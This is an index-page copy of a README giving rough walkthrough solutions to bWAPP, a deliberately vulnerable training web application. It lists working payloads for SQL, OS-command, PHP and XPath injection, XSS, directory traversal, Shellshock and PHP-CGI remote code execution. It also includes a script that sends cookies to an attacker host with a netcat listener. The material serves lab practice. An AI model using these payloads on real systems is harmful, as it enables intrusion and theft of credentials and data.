Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/skiptomyliu/solutions-bwapp
In progress rough solutions to bWAPP / bee-box
https://github.com/skiptomyliu/solutions-bwapp
appsec bwapp csrf directory-traversal html-injection sql-injection xpath-injection xss
Last synced: 21 days ago
JSON representation
In progress rough solutions to bWAPP / bee-box
- Host: GitHub
- URL: https://github.com/skiptomyliu/solutions-bwapp
- Owner: skiptomyliu
- Created: 2015-07-18T18:58:01.000Z (over 9 years ago)
- Default Branch: master
- Last Pushed: 2020-01-07T16:15:57.000Z (almost 5 years ago)
- Last Synced: 2023-11-07T18:57:10.795Z (12 months ago)
- Topics: appsec, bwapp, csrf, directory-traversal, html-injection, sql-injection, xpath-injection, xss
- Language: HTML
- Homepage:
- Size: 979 KB
- Stars: 167
- Watchers: 4
- Forks: 58
- Open Issues: 2
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# solutions-bwapp
In progress rough solutions. This is not a comprehensive solution list. Updating whenever I have the time.
Ref sheet
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
# Contributors
[@mmmds](https://github.com/mmmds)
# A1 - Injection
### HTML Injection - Reflected (GET)
htmli_get.php
```
/bWAPP/htmli_get.php?firstname=%3Ch1%3EHello%3C%2Fh1%3E&lastname=%3Ch2%3EWorld%3C%2Fh2%3E&form=submit
```
### HTML Injection - Reflected (POST)
```
Hello
World
```
### HTML Injection - Reflected (URL)
XXX: Todo, IE only?
```
/bWAPP/htmli_current_url.php
```
### HTML Injection - Stored (Blog)
Following solution taken from:
```
http://penthusiasts.blogspot.com/2013/12/bwapp-html-injection-all.html
```
```
Please login with valid credentials:
Username:Password:
```
Attacker's machine:
```
nc -l 80
```
### iFrame Injection
```
ParamUrl=robots.txt" onload="alert(1)
ParamHeight=">alert(1);
```
### OS Command Injection
```
www.nsa.gov; cat /etc/passwd
www.nsa.gov & cat /etc/passwd
www.nsa.gov | cat /etc/passwd
```
### OS Command Injection - Blind
```
www.nsa.gov | sleep 10
```
### PHP Code Injection
```
/bWAPP/phpi.php?message=a;echo "what"; $fp = fopen("/etc/passwd","r");$result = fread($fp,8192); echo $result
```
### Server-Side Includes:
```
```
### SQL Injection (GET/SEARCH)
```
a%' UNION ALL SELECT table_schema,table_name, null, null, null, null, null from information_schema.tables;--
```
### SQL Injection (GET/SELECT)
```
movie=1 UNION ALL SELECT table_schema, table_name, null, null, null, null, null FROM information_schema.tables LIMIT 1 OFFSET 1;--
```
### SQL Injection (POST/Search)
/bWAPP/sqli_6.php
```
a%' UNION ALL SELECT table_schema,table_name, null, null, null, null, null from information_schema.tables;--
```
### SQL Injection (POST/Select)
Use Burp
```
movie=1 UNION ALL SELECT table_schema, table_name, null, null, null, null, null FROM information_schema.tables LIMIT 1 OFFSET 1;--
```
### SQL Injection (AJAX/JSON/jQuery)
Use Burp
```
a%' UNION ALL SELECT table_schema,table_name, null, null, null, null, null from information_schema.tables;--
```
a%' UNION ALL SELECT 1, column_name, null, null, null, null, null from information_schema.columns where table_name="users";--
blah%' union all select 1,login,password,email,secret,1, 1 from users --
### SQL Injection (Login Form/Hero)
```
ok' or 1=1--
```
### SQL Injection(SQLite)
```
a%' UNION ALL SELECT 1,sqlite_version(),1,1,1,1; --
```
### SQL Injection - Stored (Blog)
Be sure to add a space after the -- for this one, otherwise the injection will not work
```
asdf',(SELECT database() ))--
```
To begin enumerating tables:
```
asdf',(SELECT TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'bWAPP' LIMIT 0,1 ))--
asdf',(SELECT TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'bWAPP' LIMIT 1,1 ))--
```
```
asdf',(select password from mysql.user where user='root' ))--
```
### XML/XPath Injection (Login Form)
```
password=' or id='2
```
### XML/XPath Injection (Search)
```
genre=')]/password | a[contains(a,'
genre=') or contains(genre, '
genre=') or not(contains(genre, 'xxx') and '1'='2
```
# A2 - Broken Authentication
### Broken Auth. - CAPTCHA Bypassing
Using Burp, do not allow the webpage to load captcha_box.php, this page loads the server's session variable $_SESSION["captcha"] which will then require a check on ba_captcha_bypass.php
The second requirement is to prevent captcha_user from being submitted by the client. Eliminate this using Burp:
```
POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: bepp:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://bepp:8088/bWAPP/ba_captcha_bypass.php
Cookie: PHPSESSID=67a6abb1d7ff40c55ad50d3aa43fc7c4; security_level=0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
login=bee&password=bug&form=submit
```
### Broken Auth. - Logout Management
Open second tab and logout. Second tab will still have session.
### Session Mgmt. - Administrative Portals
In URL and Cookies
```
admin=1
```
# A3 - Cross-Site Scripting (XSS)
### XSS - Reflected (GET)
xss_get.php
```
alert(document.cookie)
```
### XSS - Reflected (POST)
xss_post.php
```
alert(document.cookie)
```
### XSS - Reflected (JSON)
xss_json.php
```
"}]}';prompt(0)
```
### XSS - Reflected (AJAX/JSON)
xss_ajax_2-1.php
```
```
### XSS - Reflected (AJAX/XML)
xss_ajax_1-1.php
```
<img src='#' onerror='alert(1)'>
```
Alternatively I was able to get XSS to execute on the AJAX called.
```
xss_ajax_1-2.php?title=prompt(0)
```
### XSS - Reflected (Back Button)
Modify Referer header field
```
Referer: ';alert(1);'
```
### XSS - Reflected (Custom Header)
Add header field
```
bWAPP: alert(1)
```
### XSS - Reflected (Eval)
```
date=alert(1)
```
### XSS - Reflected (HREF)
```
Referer: alert(1)
```
### XSS - Reflected (User-Agent)
```
User-Agent: alert(1)
```
# A4 - Insecure Direct Object References
### Insecure DOR (Change Secret)
Use Burp to unhide hidden fields or intercept POST param.
### Insecure DOR (Reset Secret)
Change 'login' and 'secret' field to arbitrary values.
```
POST /bWAPP/xxe-2.php HTTP/1.1
Host: bepp:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/xml; charset=UTF-8
Referer: http://bepp:8088/bWAPP/insecure_direct_object_ref_3.php
Content-Length: 59
Cookie: PHPSESSID=77aa634b546d1c78d5afc16aae328172; security_level=0
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
beeAny bugs?
```
### Insecure DOR (Order Tickets)
bWAPP/insecure_direct_object_ref_2.php
Use Burp to unhide hidden ticket price field, or use proxy to modify the POST param while in transit.
# A5 - Security Misconfiguration
### Cross-Origin Resource Sharing (AJAX)
It's possible because of header in response:
```
Access-Control-Allow-Origin: *
```
```
function steal() {
var r = new XMLHttpRequest();
r.onreadystatechange = function() {
if (r.readyState == 4 && r.status == 200) {
alert(r.responseText);
}
};
r.open("GET", "http://192.168.1.10/bWAPP/secret-cors-1.php", true);
r.send();
}
```
### Cross-Site Tracing (XST)
Doesn't work on modern browsers as there are security enforcements. Maybe use phantomJS?
I modified the POC to use GET instead of TRACE. Additional changes from original xst.js include making the onreadystatechange NOT inline (seems to play better with FF).
1. Start listener on attacking machine: nc -l 8888
2. Modify xst.js to match your environment:
```
var xmlhttp;
// Code for IE7+, Firefox, Chrome, Opera, Safari
if (window.XMLHttpRequest)
{
xmlhttp=new XMLHttpRequest();
}
// Code for IE6, IE5
else
{
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp.onreadystatechange=foo;
function foo()
{
if (xmlhttp.readyState==4 && xmlhttp.status==200)
{
xmlResp=xmlhttp.responseText;
// document.getElementById("response").innerHTML=xmlResp
alert(xmlResp);
document.location="http://[attacker_ip]:8888/grab.cgi?"+document.cookie;
}
}
// xmlhttp.open("TRACE","/bWAPP/",true);
xmlhttp.open("GET","/bWAPP/",true);
// xmlhttp.withCredentials = true;
xmlhttp.send();
```
### Insecure FTP Configuration
Anonymous login with write permissions are enabled
```
$ ftp 192.168.1.9
Connected to 192.168.1.9.
anonymous
220 ProFTPD 1.3.1 Server (bee-box) [192.168.1.9]
Name (192.168.1.9:dean): 331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||42936|)
150 Opening ASCII mode data connection for file list
-rw-rw-r-- 1 root www-data 543803 Nov 2 2014 Iron_Man.pdf
-rw-rw-r-- 1 root www-data 462949 Nov 2 2014 Terminator_Salvation.pdf
-rw-rw-r-- 1 root www-data 544600 Nov 2 2014 The_Amazing_Spider-Man.pdf
-rw-rw-r-- 1 root www-data 526187 Nov 2 2014 The_Cabin_in_the_Woods.pdf
-rw-rw-r-- 1 root www-data 756522 Nov 2 2014 The_Dark_Knight_Rises.pdf
-rw-rw-r-- 1 root www-data 618117 Nov 2 2014 The_Incredible_Hulk.pdf
-rw-rw-r-- 1 root www-data 5010042 Nov 2 2014 bWAPP_intro.pdf
226 Transfer complete
ftp> puts test.txt
?Invalid command.
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||28299|)
150 Opening BINARY mode data connection for test.txt
0 0.00 KiB/s
226 Transfer complete
ftp> ^D
221 Goodbye.
```
### Insecure SNMP Configuration
Default community strings are set on the machine
```
$ snmpwalk -v2c -c private bwapp-server
$ snmpwalk -v2c -c public bwapp-server
```
### Insecure WebDAV Configuration
```
curl -X PUT --data '' 'http://192.168.1.10/webdav/attack.php'
```
# A6 - Sensitive Data Exposure
### Base64 Encoding (Secret)
Use Burp to get cookie
### Heartbleed Vulnerability
Use the heartbleed.py script found in the /evil directory
```
python heartbleed.py [ip]
```
# A7 - Missing Functional Level Access Control
### Directory Traversal - Directories
directory_traversal_2.php
```
/bWAPP/directory_traversal_2.php?directory=../../../../home/
```
### Directory Traversal - Files
directory_traversal_1.php
```
/bWAPP/directory_traversal_1.php?page=../../../../../etc/passwd
```
### Host Header Attack (Cache Poisoning)
hostheader_1.php
### Host Header Attack (Reset Poisoning)
hostheader_2.php
![]()
### Remote & Local File Inclusion (RFI/LFI)
Copy rfi.txt to rfi.php, it appears PHP automatically adds the suffix .php.
```
bWAPP/rlfi.php?language=../evil/rfi
```
### Restrict Device Access
Modify request
```
User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.133 Mobile Safari/535.19
```
# A8 - Cross-Site Request Forgery (CSRF)
Reference the HTML files in resources directory. You can modify these to auto execute in a hidden iframe as an exercise. If bWAPP had CSRF mitigations (such as utilization of tokens), then the POST requests made from the csrf_x.html files would respond with forbidden.
### Cross-Site Request Forgery (Change Password)
Please reference [csrf_1.html](resources/csrf_1.html). Replace the address within the HTML with your own bWAPP server and run the form to change the password. If CSRF tokens were utilized, then the server should return forbidden.
### Cross-Site Request Forgery (Change Secret)
Please references [csrf_2.html](resources/csrf_2.html). Again, replace the address within the HTML with your own bWAPP server to change the secret.
### Cross-Site Request Forgery (Transfer Amount)
Please references [csrf_3.html](resources/csrf_3.html). Again, replace the address within the HTML with your own bWAPP server to change the secret.
# A9 - Using Known Vulnerable Components
### PHP CGI Remote Code Execution
```
POST /bWAPP/admin/phpinfo.php?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1
Host: 192.168.1.20
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 70
Cookie: security_level=0; PHPSESSID=e27e4148fbb0b82028e1cd6e159f4e7a
Connection: close
```
There is also possibility to display source code
```
http://192.168.1.20/bWAPP/admin/phpinfo.php?-s
```
### Shellshock Vulnerability (CGI)
Modify /bWAPP/cgi-bin/shellshock.sh request
```
Referer: () { nothing;}; /bin/touch /tmp/malicious
```
```
Referer: () { nothing;}; echo; /bin/cat /etc/passwd
```
# Other bugs...
### HTTP Paramter Pollution
Put name
```
bee&movie=1
```
then every link will choose G.I Joe: Retaliation movie.
### HTTP Response Splitting
```
http://192.168.1.20/bWAPP/http_response_splitting.php?url=http://itsecgames.blogspot.com%0AReferer%3agoogle.com
```